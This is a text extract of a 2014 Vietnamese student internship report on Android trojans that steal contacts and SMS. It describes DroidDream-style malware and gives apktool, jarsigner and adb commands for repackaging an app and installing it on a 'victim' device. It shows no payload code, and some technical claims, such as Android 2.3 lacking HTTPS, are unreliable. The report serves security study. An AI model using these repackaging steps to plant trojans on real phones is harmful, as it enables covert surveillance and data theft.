SlideShare a Scribd company logo
1 of 53
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TP.HCM 
KHOA ĐIỆN TỬ VIỄN THÔNG 
BÁO CÁO ĐỀ TÀI THỰC TẬP 
ĐỀ TÀI : 
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO 
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH 
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI 
SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI 
 Nơi thực tập : 
TT.QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ 
ATHENA 
GVHD : VÕ ĐỖ THẮNG 
SVTH : LÊ TRẦN XUÂN LÃNH 
MSSV : 1120085 
TP.HCM -Tháng 10 / 2014
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 1 
LỜI CAM ĐOAN 
Em xin cam đoan: 
 Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực 
tiếp của thầy Võ Đỗ Thắng. 
 Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, 
tên công trình, thời gian, địa điểm công bố. 
 Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu 
hoàn toàn trách nhiệm. 
TPHCM, ngày 25 tháng 09 năm 2014 
Sinh viên thực tập 
Lê Trần Xuân Lãnh
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 2 
LỜI CẢM ƠN 
KHOA ĐIỆN TỬ VIỄN THÔNG 
Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử 
viễn thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành 
tốt đợt thực tập này.Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh 
nghiệm cho bản thân. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công 
việc và môi trường làm việc sau này. 
Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt 
nhất.Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất 
định.Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong 
tương lai. 
Một lần nữa em xin chân thành cảm ơn. 
TPHCM, ngày 25 tháng 09 năm 2014 
Sinh viên thực tập 
Lê Trần Xuân Lãnh
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 3 
LỜI CẢM ƠN 
TRUNG TÂM ATHENA 
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh 
chị nhân viên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin 
chân thành cám ơn Thầy Võ Tất Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn 
thành tốt khóa thực tập. 
Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh 
khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh 
nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, 
em rất mong nhận được ý kiến đóng góp củaThầy để em học thêm được nhiều kinh 
nghiệm . 
Em xin chân thành cảm ơn ! 
Thầy Võ Đỗ Thắng (bên phải) cùng SVTT Lê Trần Xuân Lãnh (bên trái)
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 4 
NHẬN XÉT CỦA KHOA 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
TPHCM, ngày ... tháng ... năm 2014 
Chủ nhiệm khoa
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 5 
ĐÁNH GIÁ CỦA GVHD: 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
......................................................................................................................................................... 
TPHCM, ngày ... tháng ... năm 2014 
Giá o viê n hướng dẫ n
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 6 
GIỚI THIỆU 
- Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các 
công ty nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho 
tin tặc cùng các phần mềm độc hại. 
- Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để 
nhận ra rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào 
trường hợp facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng 
đông đảo, lập tức nó trở thành đích ngắm của các tin tặc.Giới tội phạm mạng luôn tìm 
mọi cách để lợi dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số 
đông thiết bị. Và điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi 
mới đến thiết bị. Các nhà nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng 
Android bất cẩn luôn tải về ứng dụng mà không thèm kiểm tra tìm hiểu trước xem 
chúng có an toàn hay không. 
- Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android 
đồng thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo 
cáo của em.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 7 
MỤC LỤC 
PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP .................................................................................. 8 
I. Giới thiệu về Trung tâm Athena .................................................................................................. 8 
II. Trụ sở và các chi nhánh ............................................................................................................ 8 
III. Cơ cấu tổ chức:........................................................................................................................ 9 
PHẦN II: BÁO CÁO ĐỀ TÀI ...................................................................................................... 10 
I. Nghiên cứu hệ điều hành Android trên môi trường giả lập. .......................................................... 10 
1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. ........................................ 10 
1.1 Cài đặt Java trên máy tính. .............................................................................................. 10 
1.2 Download và Cài đặt Eclipse, Android SDK.................................................................... 12 
1.3 Tạo máy AVD (Android Virtual Device).......................................................................... 14 
2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x............................................... 17 
2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.................................................... 17 
2.2. Sự khác nhau về giao diện. ............................................................................................. 18 
2.3. Sự khác nhau về tính năng. ............................................................................................ 19 
2.4. Sự khác nhau về giao thức mạng. ................................................................................... 20 
3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch) .................................... 20 
4. Nghiên cứu các chương trình có mã đọc trên Android (iCalendar) ..................................... 20 
4.1. Thực trạng.................................................................................................................... 20 
4.2. Nghiên cứu lỗ hổng bảo mật trên Android. ..................................................................... 21 
4.3. Cài đặt trojan trên Android (iCalendar) .......................................................................... 22 
5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập thẻ Sd 
card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa ...... 23 
5.1 Tìm hiểu Kali Linux ....................................................................................................... 23 
5.2 Cài đặt Kali Linux trên máy ảo VMWare ......................................................................... 24 
5.3 Tạo mã độc trên Kali Linux để xâm nhập Android ........................................................... 32 
II. Thực hiện trên môi trường internet .......................................................................................... 43 
1. Cài mã độc trên VPS........................................................................................................... 43 
1.1 Giới thiệu Metasploit lên VPS ....................................................................................... 43 
1.2 Cài đặt .......................................................................................................................... 43 
2. Từ VPS điều khiển thiết bị qua internet ............................................................................... 47 
III. Tổng kết:............................................................................................................................... 52
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 8 
PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP 
I. Giới thiệu về Trung tâm Athena 
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền 
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu 
viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy 
phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 
04 tháng 11 năm 2008. 
-Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING 
NETWORK SECURITY COMPANY LIMITED 
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt 
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin.Với quyết tâm góp phần vào 
công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập 
trung chủ yếu vào các họat động sau: 
- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy 
tính, internet, bảo mật và thương mại điện tử…. 
- Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất 
kinh doanh. 
- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia 
về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp 
có nhu cầu. 
- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ 
liệu thông tin về các ứng dụng và sự cố mạng. 
- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra 
sự cố máy tính. 
II. Trụ sở và các chi nhánh 
- Trụ sở chính: 
+ Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế 
ATHENA.92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt 
Nam. 
+ Website: www.athena.com.vn
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 9 
+ Điện thoại: ( 84-8 ) 3824 4041 
+ Hotline: 0943 23 00 99 
- Cơ sở 2_Tại TP Hồ Chí Minh: 
+ Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 
Số 2 Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. 
+ Website: www.Athena.Edu.Vn 
+ Điện thoại: ( 84-8 ) 2210 3801 
+ Hotline: 0943 20 00 88 
- Chi nhánh Nha Trang: 
+ Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692 
+ Website: www.athena.edu.vn 
+ Email :training@athenavn.com 
III. Cơ cấu tổ chức: 
- Sơ đồ tổ chức công ty:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 10 
PHẦN II: BÁO CÁO ĐỀ TÀI 
I. Nghiên cứu hệ điều hành Android trên môi trường giả lập. 
1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. 
1.1 Cài đặt Java trên máy tính. 
- Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ 
JDK. Bạn có thể download bộ JDK tại địa chỉ : tại đây. 
(Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download 
cho phù hợp) 
- Sau khi tải bộ JDK về máy.các bạn tiến hành cài đặt chúng. 
- Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next… 
- Và đợi cho tới khi quá trình cài đặt hoàn tất.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đã cài được trên máy tính 
của bạn chưa bẳng cách vào CMD và gõ lệnh: “java” 
- Nếu màn hình hiện ra như sau là bạn đã hoàn thành rồi: 
Trang 11
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 12 
1.2 Download và Cài đặt Eclipse, Android SDK. 
- Trước tiên ta phải download bộ Eclipse. 
+ Các bạn vào địa chỉ : http://developer.android.com/sdk/index.html 
+ Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle 
for Windows
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 13 
- Sau khi download về, các bạn giải nén ra và sẽ có các file như sau : 
- Để cài đặt Android SDK các bạn có 2 cách: 
+ Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến 
hành cài đặt. 
+ Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK 
Manager cũng được:
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 14 
- Sẽ xuất hiện 1 cửa sổ mới như sau : 
- Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào 
nút :Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong. 
1.3Tạo máy AVD (Android Virtual Device). 
- Đầu tiên bạn khởi chạy Eclipse lên. 
- Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần 
hướng dẫn trước. 
- Sau khi khởi chạy xong Eclipse. 
+Bạn vào : Windows ->Android Virtual Device Manager. 
+Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu 
của Eclipse :
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 15 
- Click vào New để tạo mới : 
- Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” 
Trang 16 
mà thôi. 
Target : Bạn chọn phiên bản Android để test. 
SD Card : Là dung lượng bộ nhớ ảo của thẻ SD. 
Và một số thông tin khác… 
Các bạn click OK để hoàn thành tạo mới một AVD. 
Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn 
sẽ thấy tên máy ảo mới mình vừa tạo rồi. 
Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian 
để máy ảo khởi chạy) :
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 17 
2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x. 
2.1. Sự khác nhau về yêu cầu phần cứng cần thi ết để cài đặt. 
Android 2.3 Android 4x 
Cần ít nhất 128 MB bộ nhớ có sẵn cho 
Kernel và cho không gian người sử dụng 
Cần ít nhất 340 MB bộ nhớ có sẵn cho 
kernel và cho không gian người sử dụng 
Dung lượng Ram tối thiểu cần thiết là 
150MB 
Dung lượng Ram tối thiểu cần thiết là 350 
MB 
Màn hình: 
- Màn hình phải có kích cỡ ít nhất 2,5 inch 
- Mật độ phải được ít nhất 100 dpi 
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 
Màn hình: 
- Màn hình phải có kích cỡ ít nhất 
426x320 
- Mật độ phải được ít nhất 100 dpi
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 18 
(16:9) 
- Công nghệ màn hình được sử dụng là 
công nghệ “ Square pixels” 
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 
(16:9) 
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý 
Các API Android bao gồm trình 
quản lý download các ứng dụng có thể sử 
dụng để tải dữ liệu.Trình quản lí download 
phải có khả năng tải tập tin có dung lượng ít 
nhất 55 MB 
Các API Android bao gồm trình 
quản lý download các ứng dụng có thể sử 
dụng để tải dữ liệu.Trình quản lí download 
phải có khả năng tải tập tin có dung lượng ít 
nhất 100 MB 
2.2. Sự khác nhau về giao di ện. 
- Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng 
cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn 
và thu lại để xử lý các đối tượng trên màn hình.Sự phản ứng với tác động của người 
dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường 
dùng tính năng rung của thiết bị để tạo phảnhồi rung cho người dùng. Những thiết bị 
phần cứng bên trong như gia tốckế, con quay hồi chuyển và cảm biến khoảng cách 
được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví 
dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo 
vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như 
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu 
với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn 
làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng 
(icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện 
ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư 
của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình 
chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao 
diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự 
do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do 
các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người 
dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệđiều
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà 
mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân 
biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị 
thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để 
xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như 
email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng 
cảm thấy bất tiện.Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo 
để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính 
năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải 
mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc 
hoặc xóa nó đi. 
Trang 19 
Android 2.3 Android 4x 
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt 
hơn 
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom 
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà 
không cần mở ứng dụng 
2.3. Sự khác nhau về tính năng. 
Android 2.3 Android 4x 
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet 
Chỉ có thể xóa tất các các thông báo cùng 
lúc trên trình quản lý 
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc 
trên trình quản lý 
Chỉ có thể trả lời, ngắt cuộc gọi khi màn 
hình bị khóa 
Có thể thực hiện thêm 1 số tính năng khi màn 
hình bị khoái ngoài trả lời , ngắt cuộc gọi như 
gửi tin nhắn 
Không có tính năng mở khóa màn hình 
nhận diện khuôn mặt 
Có tính năng mở khóa màn hình nhận diện 
khuôn mặt 
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện 
được tất cả các camera trên thiết bị
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
Trang 20 
2.4. Sự khác nhau về giao thức mạng. 
Android 2.3 Android 4x 
Không hỗ trợ giao thức https Hỗ trợ giao thức https 
3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch) 
Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm 
4. Nghiên cứu các chương trình có mã đọc trên Android (iCalendar) 
4.1. Thực trạng 
- Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên 
Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc 
mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng 
Android. Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của 
Google vừa được hãng bảo mật Kaspersky Lab công bố. 
- Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ 
yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ 
những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn 
cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được 
cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát 
tán trên Android trong quý I năm 2013. 
- Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số 
lượng các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, 
Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di độngbằng tổng 
số lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh 
hưởng nặng nhất. 
- Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các 
loại mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực 
bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, 
đồng thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện 
cho mã độc được phát tán dễ dàng hơn trên nền tảng di động này.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong 
quý I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu 
dựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link có 
chứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như 
Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của 
hacker. 
Trang 21 
4.2. Nghiên cứu l ỗ hổng bảo mật trên Android. 
 Malware trên Android. 
- Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần 
mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà 
người sử dụng không hề hay biết. 
- Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới 
chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ 
chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức 
hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus 
phá hủy. 
 Cơ chế hoạt động của Malware. 
- Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là 
Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: 
+ Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng 
ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền 
root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu 
tiên. 
+ Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt 
cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các 
thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một 
khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt 
một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. 
Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài 
đặt các ứng dụng mà không được phép.
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu 
việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, 
checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là 
Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào 
khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà 
điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn 
hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. 
Trang 22 
 Mục đích của Malware DroidDream 
- DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích 
của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của 
người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể 
của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như 
Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho 
phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một 
cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là 
Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch 
vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 
lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng 
thực sẽ bị thu thập bởi các malware này. 
- Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. 
Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một 
theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến 
an sự an toàn của người dùng hệ điều hành này. 
4.3. Cài đặt trojan trên Android (iCalendar) 
1.Dùng công cụ apktool để chỉnh sửa file apk 
apktool if name.apk 
apktool d name.apk 
apktool b name 
2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng 
keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA - 
keysize 2048 -validity 10000
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name-name. 
keystore name.apk name 
jarsigner -verify -verbose -certs name.apk 
Trang 23 
3.Cài đặt ứng dụng lên máy nạn nhân 
adb -s emulator-device install name.apk 
Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm 
5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập 
thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều 
khiển từ xa 
5.1 Tìm hi ểu Kali Linux 
- Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để 
kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính.Tiền thân của Kali 
Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa 
chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive 
Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như 
phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ 
thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. 
 Nói về ưu đi ểm của Kali là nói về những thay đổi giữa BackTrack và 
Kali.So với BackTrack, Kali có rất nhiều cải tiến: 
 Kali phát triển trên nền tảng hệ điều hành Debian 
- Điều này có nghĩa Kali có rất nhiều ưu điểm.Đầu tiên là các Repository (Kho lưu trữ 
phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có 
được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.Duy trì cập 
nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan 
trọng. 
- Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của 
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc 
hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét 
hoặc thay đổi mã nguồn của các công cụ. 
 Tính tương thích kiến trúc
Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh 
- Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến 
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta 
có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. 
Trang 24 
 Hỗ trợ mạng không dây tốt hơn 
- Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là 
sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay 
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá 
mạng không dây. 
 Khả năng tùy biến cao 
- Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với 
giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như 
GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. 
 Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai 
